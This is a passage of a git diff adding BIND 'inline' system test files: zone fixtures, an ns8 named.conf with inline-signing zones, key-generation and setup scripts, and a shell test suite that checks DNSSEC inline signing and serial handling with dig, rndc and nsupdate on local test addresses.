index 0000000..3ebf398 --- /dev/null +++ b/bin/tests/system/inline/ns8/example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns8 +ns8 A 10.53.0.8 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/inline/ns8/example2.db.in b/bin/tests/system/inline/ns8/example2.db.in new file mode 100644 index 0000000..1f42c3a --- /dev/null +++ b/bin/tests/system/inline/ns8/example2.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns8 +ns8 A 10.53.0.8 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/inline/ns8/example3.db.in b/bin/tests/system/inline/ns8/example3.db.in new file mode 100644 index 0000000..a9e3daa --- /dev/null +++ b/bin/tests/system/inline/ns8/example3.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 400 +@ IN SOA mname1. . ( + 3 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns8 +ns8 A 10.53.0.8 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/inline/ns8/named.conf.in b/bin/tests/system/inline/ns8/named.conf.in new file mode 100644 index 0000000..27590da --- /dev/null +++ b/bin/tests/system/inline/ns8/named.conf.in @@ -0,0 +1,162 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS8 + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.8 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.8; + notify-source 10.53.0.8; + transfer-source 10.53.0.8; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.8; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + try-tcp-refresh no; + notify-delay 0; + allow-new-zones yes; +}; + +zone "example01.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example01.com.db"; +}; + +zone "example02.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example02.com.db"; +}; + +zone "example03.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example03.com.db"; +}; + +zone "example04.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example04.com.db"; +}; + +zone "example05.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example05.com.db"; +}; + +zone "example06.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example06.com.db"; +}; + +zone "example07.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example07.com.db"; +}; + +zone "example08.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example08.com.db"; +}; + +zone "example09.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example09.com.db"; +}; + +zone "example10.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example10.com.db"; +}; + +zone "example11.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example11.com.db"; +}; + +zone "example12.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example12.com.db"; +}; + +zone "example13.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example13.com.db"; +}; + +zone "example14.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example14.com.db"; +}; + +zone "example15.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example15.com.db"; +}; + +zone "example16.com" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example16.com.db"; +}; + +zone example { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "example.db"; +}; + +zone "unsigned-serial-test" { + type primary; + inline-signing yes; + auto-dnssec maintain; + file "unsigned-serial-test.db"; +}; diff --git a/bin/tests/system/inline/ns8/sign.sh b/bin/tests/system/inline/ns8/sign.sh new file mode 100755 index 0000000..cedad7c --- /dev/null +++ b/bin/tests/system/inline/ns8/sign.sh @@ -0,0 +1,36 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +for zone in example01.com example02.com example03.com example04.com \ + example05.com example06.com example07.com example08.com \ + example09.com example10.com example11.com example12.com \ + example13.com example14.com example15.com example16.com +do + rm -f K${zone}.+*+*.key + rm -f K${zone}.+*+*.private + keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone) + keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone -f KSK $zone) + cp example.com.db.in ${zone}.db + $SIGNER -S -T 3600 -O raw -L 2000042407 -o ${zone} ${zone}.db > /dev/null 2>&1 +done + +for zone in example unsigned-serial-test; do + rm -f K${zone}.+*+*.key + rm -f K${zone}.+*+*.private + keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone $zone) + keyname=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n zone -f KSK $zone) + cp example.db.in ${zone}.db +done diff --git a/bin/tests/system/inline/setup.sh b/bin/tests/system/inline/setup.sh new file mode 100644 index 0000000..b31606c --- /dev/null +++ b/bin/tests/system/inline/setup.sh @@ -0,0 +1,57 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp ns1/root.db.in ns1/root.db + +touch ns2/trusted.conf +cp ns2/nsec3-loop.db.in ns2/nsec3-loop.db +cp ns2/bits.db.in ns2/bits.db +cp ns2/bits.db.in ns2/inactiveksk.db +cp ns2/bits.db.in ns2/inactivezsk.db +cp ns2/bits.db.in ns2/nokeys.db +cp ns2/bits.db.in ns2/removedkeys-secondary.db +cp ns2/bits.db.in ns2/retransfer.db +cp ns2/bits.db.in ns2/retransfer3.db + +cp ns3/master.db.in ns3/master.db +cp ns3/master.db.in ns3/dynamic.db +cp ns3/master.db.in ns3/updated.db +cp ns3/master.db.in ns3/unsupported.db +cp ns3/master.db.in ns3/expired.db +cp ns3/master.db.in ns3/nsec3.db +cp ns3/master.db.in ns3/externalkey.db +cp ns3/master.db.in ns3/delayedkeys.db +cp ns3/master.db.in ns3/removedkeys-primary.db +cp ns3/include.db.in ns3/include.db + +mkdir ns3/removedkeys + +touch ns4/trusted.conf +cp ns4/noixfr.db.in ns4/noixfr.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.pre ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf +copy_setports ns7/named.conf.in ns7/named.conf +copy_setports ns8/named.conf.in ns8/named.conf + +(cd ns3; $SHELL -e sign.sh) +(cd ns1; $SHELL -e sign.sh) +(cd ns7; $SHELL -e sign.sh) +(cd ns8; $SHELL -e sign.sh) diff --git a/bin/tests/system/inline/tests.sh b/bin/tests/system/inline/tests.sh new file mode 100755 index 0000000..2242d79 --- /dev/null +++ b/bin/tests/system/inline/tests.sh @@ -0,0 +1,1488 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +dig_with_opts() { + $DIG $DIGOPTS "$@" +} + +rndccmd() { + $RNDCCMD "$@" +} + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +$RNDCCMD 10.53.0.3 signing -nsec3param 1 0 0 - nsec3 > /dev/null 2>&1 + +for i in 1 2 3 4 5 6 7 8 9 0 +do + nsec3param=$($DIG $DIGOPTS +nodnssec +short @10.53.0.3 nsec3param nsec3.) + test "$nsec3param" = "1 0 0 -" && break + sleep 1 +done + +n=$((n + 1)) +echo_i "checking that an unsupported algorithm is not used for signing ($n)" +ret=0 +grep -q "algorithm is unsupported" ns3/named.run || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that rrsigs are replaced with ksk only ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr nsec3. | + awk '/RRSIG NSEC3/ {a[$1]++} END { for (i in a) {if (a[i] != 1) exit (1)}}' || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the zone is signed on initial transfer ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking expired signatures are updated on load ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 +noall +answer +dnssec expired SOA > dig.out.ns3.test$n +expiry=$(awk '$4 == "RRSIG" { print $9 }' dig.out.ns3.test$n) +[ "$expiry" = "20110101000000" ] && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of private type record via 'rndc signing -clear' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 +keys=$(sed -n -e 's/Done signing with key \(.*\)$/\1/p' signing.out.test$n) +for key in $keys; do + $RNDCCMD 10.53.0.3 signing -clear ${key} bits > /dev/null || ret=1 + break; # We only want to remove 1 record for now. +done 2>&1 |sed 's/^/ns3 /' | cat_i + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + num=$(grep "Done signing with" signing.out.test$n | wc -l) + [ $num = 1 ] && break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking private type was properly signed ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 bits TYPE65534 > dig.out.ns6.test$n +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of remaining private type record via 'rndc signing -clear all' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all bits > /dev/null || ret=1 + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list bits > signing.out.test$n 2>&1 + grep "No signing records found" signing.out.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking negative private type response was properly signed ($n)" +ret=0 +sleep 1 +$DIG $DIGOPTS @10.53.0.6 bits TYPE65534 > dig.out.ns6.test$n +grep "status: NOERROR" dig.out.ns6.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add added.bits 0 A 1.2.3.4 +send +EOF + +n=$((n + 1)) +echo_i "checking that the record is added on the hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 added.bits A > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that update has been transferred and has been signed ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 added.bits A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add bits 0 SOA ns2.bits. . 2011072400 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072400" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial in signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072400" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the zone is signed on initial transfer, noixfr ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list noixfr > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add added.noixfr 0 A 1.2.3.4 +send +EOF + +n=$((n + 1)) +echo_i "checking that the record is added on the hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 added.noixfr A > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that update has been transferred and has been signed, noixfr ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 added.noixfr A > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 2011072400 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072400" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072400) serial in signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072400" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the primary zone signed on initial load ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of private type record via 'rndc signing -clear' (primary) ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 +keys=$(sed -n -e 's/Done signing with key \(.*\)$/\1/p' signing.out.test$n) +for key in $keys; do + $RNDCCMD 10.53.0.3 signing -clear ${key} master > /dev/null || ret=1 + break; # We only want to remove 1 record for now. +done 2>&1 |sed 's/^/ns3 /' | cat_i + +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + num=$(grep "Done signing with" signing.out.test$n | wc -l) + [ $num = 1 ] && break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking private type was properly signed (primary) ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.6 master TYPE65534 > dig.out.ns6.test$n +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ret=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking removal of remaining private type record via 'rndc signing -clear' (primary) ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all master > /dev/null || ret=1 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $RNDCCMD 10.53.0.3 signing -list master > signing.out.test$n 2>&1 + grep "No signing records found" signing.out.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding of record to unsigned primary ($n)" +ret=0 +cp ns3/master2.db.in ns3/master.db +rndc_reload ns3 10.53.0.3 master +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 e.master A > dig.out.ns3.test$n + grep "10.0.0.5" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding record fails when SOA serial not changed ($n)" +ret=0 +echo "c A 10.0.0.3" >> ns3/master.db +rndc_reload ns3 10.53.0.3 +sleep 1 +$DIG $DIGOPTS @10.53.0.3 c.master A > dig.out.ns3.test$n +grep "NXDOMAIN" dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check adding record works after updating SOA serial ($n)" +ret=0 +cp ns3/master3.db.in ns3/master.db +$RNDCCMD 10.53.0.3 reload master 2>&1 | sed 's/^/ns3 /' | cat_i +for i in 1 2 3 4 5 6 7 8 9 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 c.master A > dig.out.ns3.test$n + grep "10.0.0.3" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 1 ] || break + sleep 1 +done +[ $ans = 0 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "check the added record was properly signed ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 e.master A > dig.out.ns6.test$n +grep "10.0.0.5" dig.out.ns6.test$n > /dev/null || ans=1 +grep "ANSWER: 2," dig.out.ns6.test$n > /dev/null || ans=1 +grep "flags:.* ad[ ;]" dig.out.ns6.test$n > /dev/null || ans=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking that the dynamic primary zone signed on initial load ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $RNDCCMD 10.53.0.3 signing -list dynamic > signing.out.test$n 2>&1 + keys=$(grep '^Done signing' signing.out.test$n | wc -l) + [ $keys = 2 ] || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking primary zone that was updated while offline is correct ($n)" +ret=0 +$DIG $DIGOPTS +nodnssec +short @10.53.0.3 updated SOA >dig.out.ns2.soa.test$n +serial=$(awk '{print $3}' dig.out.ns2.soa.test$n) +# serial should have changed +[ "$serial" = "2000042407" ] && ret=1 +# e.updated should exist and should be signed +$DIG $DIGOPTS @10.53.0.3 e.updated A > dig.out.ns3.test$n +grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 +grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 +# updated.db.signed.jnl should exist, should have the source serial +# of master2.db, and should show a minimal diff: no more than 8 added +# records (SOA/RRSIG, 2 x NSEC/RRSIG, A/RRSIG), and 4 removed records +# (SOA/RRSIG, NSEC/RRSIG). +$JOURNALPRINT ns3/updated.db.signed.jnl >journalprint.out.test$n +serial=$(awk '/Source serial =/ {print $4}' journalprint.out.test$n) +[ "$serial" = "2000042408" ] || ret=1 +diffsize=$(wc -l < journalprint.out.test$n) +[ "$diffsize" -le 13 ] || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking adding of record to unsigned primary using UPDATE ($n)" +ret=0 + +[ -f ns3/dynamic.db.jnl ] && { ret=1 ; echo_i "journal exists (pretest)" ; } + +$NSUPDATE << EOF +zone dynamic +server 10.53.0.3 ${PORT} +update add e.dynamic 0 A 1.2.3.4 +send +EOF + +[ -f ns3/dynamic.db.jnl ] || { ret=1 ; echo_i "journal does not exist (posttest)" ; } + +for i in 1 2 3 4 5 6 7 8 9 10 +do + ans=0 + $DIG $DIGOPTS @10.53.0.3 e.dynamic > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ans=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ans=1 + grep "1.2.3.4" dig.out.ns3.test$n > /dev/null || ans=1 + [ $ans = 0 ] && break + sleep 1 +done +[ $ans = 0 ] || { ret=1; echo_i "signed record not found"; cat dig.out.ns3.test$n ; } + +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "stop bump in the wire signer server ($n)" +ret=0 +stop_server ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "restart bump in the wire signer server ($n)" +ret=0 +start_server --noclean --restart --port ${PORT} ns3 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.2 ${PORT} +update add bits 0 SOA ns2.bits. . 2011072450 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072450" dig.out.ns2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial in signed zone ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 bits SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072450" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone noixfr +server 10.53.0.4 ${PORT} +update add noixfr 0 SOA ns4.noixfr. . 2011072450 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial on hidden primary, noixfr ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.4 noixfr SOA > dig.out.ns4.test$n +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns4.test$n > /dev/null || ret=1 +grep "2011072450" dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n + 1)) +echo_i "checking YYYYMMDDVV (2011072450) serial in signed zone, noixfr ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG $DIGOPTS @10.53.0.3 noixfr SOA > dig.out.ns3.test$n + grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1 + grep "ANSWER: 2," dig.out.ns3.test$n > /dev/null || ret=1 + grep "2011072450" dig.out.ns3.test$n > /dev/null || ret=1 + if [ $ret = 0 ]; then break; fi + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +$NSUPDATE << EOF +zone bits +server 10.53.0.3 ${PORT} +update add bits 0 SOA ns2.bits. . 2011072460 20 20 1814400 3600 +send +EOF + +n=$((n + 1)) +echo_i "checking forwarded update on hidden primary ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 bits SOA > dig.out.ns2.test$n +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns2.test$n > /dev/null || ret=1 +grep "2011072460" 